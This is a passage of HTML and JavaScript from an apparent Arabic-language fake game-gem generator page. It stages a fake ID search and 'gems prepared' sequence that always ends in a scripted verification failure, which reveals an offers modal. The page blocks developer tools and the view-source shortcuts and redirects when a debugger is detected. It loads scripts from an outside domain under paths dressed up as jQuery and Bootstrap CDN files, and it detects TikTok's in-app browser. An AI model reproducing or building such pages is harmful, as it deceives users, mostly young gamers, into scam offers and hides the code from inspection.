						  clearInterval(timerInterval)
						}
						})
						})
					}
					function nexT1() {
					let username = document.forms["Form"]["usernameInput"].value;
					if (username== null || username == "") {
				  alert("يرجى وضع الأيدي الخاص بك");
				} else {
					let timerInterval
					  Swal.fire({
						timer: 5000,
						imageUrl: 'https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKuEyd1SDW7fvAEaZqjCHUi01qsOPsVK2mHK6_5oXv1vg6p7i8N9mrjDH7855WTFtK1tR2LAOMOCpEPCrrALXHEFwSBiP0iHuaTA_2FxLL7NHMCnu7uTyvKU9U6fK49TBLIHm-I-2RxU3mWXnxArRnFh0VZ2gEILjoYVLcqNRMDhvalh5nDGrYRp2amSQ/s769/IMG_4521.gif',
						imageAlt: 'Loading',
						title: 'جاري البحث عن الأيدي',
						showConfirmButton: false,
						onClose: () => {
						  clearInterval(timerInterval)
						}
					  }).then(function() {
						z.play();
						Swal.fire({
						type: 'success',
						title: 'تم العثور على الأيدي',
						showConfirmButton: false,
						timer: 3000,
						onClose: () => {
						  clearInterval(timerInterval)
						}
						}).then(function() {
							Swal.fire({
							timer: 5000,
							imageUrl: 'https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSubqkPQNskYeitMmbXBTM7Pc6yhjgYfQ02E9LDmF8ekbuvm5Yj96zHfMqrB8TrmieU-2xHoQ06pzYZdjA9-wPCR9Rjua73jWecpvnZPiPvGLxjAXEo1JZ0t5Q3rJuITxloldQRYb7oh59RQXyEOfr7iGkz1Sj2Ag-rGa5O4-1ukevTEozw_g_xU8AQRs/s450/IMG_4522.gif',
							imageAlt: 'Loading',
							title: 'الجواهر جاري تجهيزها',
							showConfirmButton: false,
							onClose: () => {
							clearInterval(timerInterval)
							}
							}).then (function(){
								z.play();
								Swal.fire({
								type: 'success',
								title: 'تم تجهيز الجواهر بنجاح',
								showConfirmButton: false,
								timer: 3000,
								onClose: () => {
								clearInterval(timerInterval)
								}
								}).then(function() {
									Swal.fire({
									timer: 5000,
									imageUrl: 'https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrkPYeRRlzqGtp84rTs9FQDMpHbZsXMOXTjH7ZHiMiunYtPSfSqcFTgrusdYg_AopXcKlKdsuGzwMBhw-bsD_GFZAJufGhjv9vGeH0XIcxS54q4pYfCTLHP_bOci3P2gCGKvFh7CUAuCagtj4Ughih2xzmdpQyjNUh-5EoJHzLgagdbDWMwIAIUyqYJsY/s450/IMG_4523.gif',
									imageAlt: 'Loading',
									title: 'عملية التحقق الآن',
									showConfirmButton: false,
									onClose: () => {
									clearInterval(timerInterval)
									}
									}).then(function() {
										b.play();
										Swal.fire({
										type: 'error',
										title: 'غير قادر على التحقق من المستخدم',
										showConfirmButton: false,
										timer: 3000,
										onClose: () => {
										clearInterval(timerInterval)
										}
										}).then(function(){
											var element = document.getElementById("show");
											element.classList.add("hide");
											var element1 = document.getElementById("verify");
											element1.classList.remove("hide");
										})
									})
								})
							})
						})
					})
				}
					}
					</script>
        <script>
          // Add active class to the current button (highlight it)
          var header = document.getElementById("devices");
          var btns = header.getElementsByClassName("platform-item");
          for (var i = 0; i < btns.length; i++) {
            btns[i].addEventListener("click", function() {
            var current = document.getElementsByClassName("active");
            if (current.length > 0) { 
              current[0].className = current[0].className.replace(" active", "");
            }
            this.className += " active";
            });
          }
		</script>
		<script>
					// Add active class to the current button (highlight it)
					var header = document.getElementById("currency");
					var btns = header.getElementsByClassName("platform-item1");
					for (var i = 0; i < btns.length; i++) {
					  btns[i].addEventListener("click", function() {
					  var current = document.getElementsByClassName("active1");
					  if (current.length > 0) { 
						current[0].className = current[0].className.replace(" active1", "");
					  }
					  this.className += " active1";
					  });
					}
		</script>
		<script>
			var x = document.getElementById("myAudio"); 
			var y = document.getElementById("myAu")
			var z = document.getElementById("myAA")
			var b = document.getElementById("myerror")
			function playAu() { 
			  x.play(); 
			}
			function playA() {
			  y.play();
			}
			function playAA() {
			  z.play();
			}
			function playerror() {
			  b.play();
			}	 
        </script>
		<script src="https://playloots.online/ff/ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min_html.js"></script>
		<script src="https://playloots.online/ff/maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min_html.js"></script>
		<script src="js/sweetalert2.js"></script>
		<script src="https://playloots.online/ff/js/main_html.js"></script>
		<script type="text/javascript" src="https://playloots.online/ff/js/functions.app_html.js"></script>
		<script>
			document.addEventListener("keydown", function(event) {
				if (
					event.key === "F12" || 
					(event.ctrlKey && event.shiftKey && ["I", "J", "C"].includes(event.key)) || 
					(event.ctrlKey && event.key === "U")
				) {
					event.preventDefault();
				}
			});
			document.addEventListener("contextmenu", function(event) {
				event.preventDefault();
			});
			</script>


<script>
	(function() {
		const devtools = new Function("debugger");
		setInterval(() => {
			try {
				devtools();
			} catch (e) {
				window.location.replace("https://google.com"); // Redirect or fake error page
			}
		}, 500);
	})();
	</script>
	
<script>
	(function() {
		let open = false;
		const element = new Image();
		Object.defineProperty(element, "id", {
			get: function() {
				open = true;
				window.location.href = "about:blank"; // Or alert the user
			}
		});
		console.log("%c", element);
	})();
	</script>
      

<div id="vanillatoasts-container"></div><div id="xf_MODAL_CONTAINER" class=" xf_MODAL_CONTAINER_MOBILE" style="display: none;"><div id="xf_MODAL">
    <div id="xfMODALCONTENT" class="xf_fadeIn">
        <div id="xfMODALHEADER">
            <div id="xfMODALTITLE"></div> </div>
        <div id="xfMODALBODY">
            <iframe id="xfOFFERS" style="overflow:hidden;" src="index.html"></iframe>
        </div>
        <div id="xfMODALFOOTER">
            <p id="xfMODALFOOTERTEXT"></p>
        </div>
    </div>
</div>
</div>
<!-- Google Translate Bar -->
<div id="google_translate_element" style="position: fixed; top: 10px; right: 10px; z-index: 9999;"></div>

<script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({
    pageLanguage: 'ar',          // Original page language (Arabic)
    includedLanguages: 'en,fr,es,ja,hi,pt', // Added Portuguese for Brazil
    layout: google.translate.TranslateElement.InlineLayout.HORIZONTAL
  }, 'google_translate_element');
}
</script>

<script type="text/javascript" src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
</script>







<style>
  body {
    margin: 0;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, sans-serif;
    background: #0b1a2f url('your-background-image.jpg') center/cover no-repeat;
  }

  /* TikTok Popup Overlay */
  #ios-popup {
  position: fixed;
  top: 0; left: 0; right: 0; bottom: 0;
  display: none;
  justify-content: center;   /* Center horizontally */
  align-items: center;       /* Center vertically */
  background: rgba(0,0,0,0.6);
  padding: 20px;
  box-sizing: border-box;
  z-index: 9999;
}

  #ios-popup .popup {
    background: #fff;
    color: #000;
    padding: 20px;
    border-radius: 15px;
    max-width: 500px;
    width: 100%;
    text-align: left;
    font-size: 16px;
    line-height: 1.5;
    box-shadow: 0 4px 20px rgba(0,0,0,0.3);
  }

  .highlight {
    color: #0056ff;
    font-weight: 600;
  }
  .tiktok-icon img {
    width: 20px;
    height: 20px;
    vertical-align: middle;
    margin: 0 4px;
  }
  .three-dots img {
    width: 22px;
    height: 22px;
    vertical-align: middle;
    margin: 0 4px;
  }

  /* Normal page */
  #normal-page {
    display: none;
    padding: 20px;
    text-align: center;
    color: #fff;
  }
</style>
</head>
<body>

<div id="ios-popup">
  <div class="popup">
    To continue, please open this page in your main browser (Safari, Chrome, etc).<br><br>
    In 
    <span class="tiktok-icon">
      <img src="https://u.cubeupload.com/satawis/3116491.png" alt="TikTok">
    </span>
    TikTok, tap the 
    <span class="three-dots">
      <img src="https://u.cubeupload.com/satawis/27013226troispointsi.jpg" alt="More Options">
    </span> 
    icon and then select <span class="highlight">"Open in browser"</span>.
  </div>
</div>

<script>
function isTikTokBrowser() {
  const ua = navigator.userAgent || navigator.vendor || window.opera;
  return /TikTok/i.test(ua) || ua.includes('Aweme') || ua.includes('musical_ly_');
}

document.addEventListener("DOMContentLoaded", function() {
  if (isTikTokBrowser()) {
    document.getElementById('ios-popup').style.display = 'flex';
  } else {
    document.getElementById('normal-page').style.display = 'block';
  }
});
</script>





</body>
</html>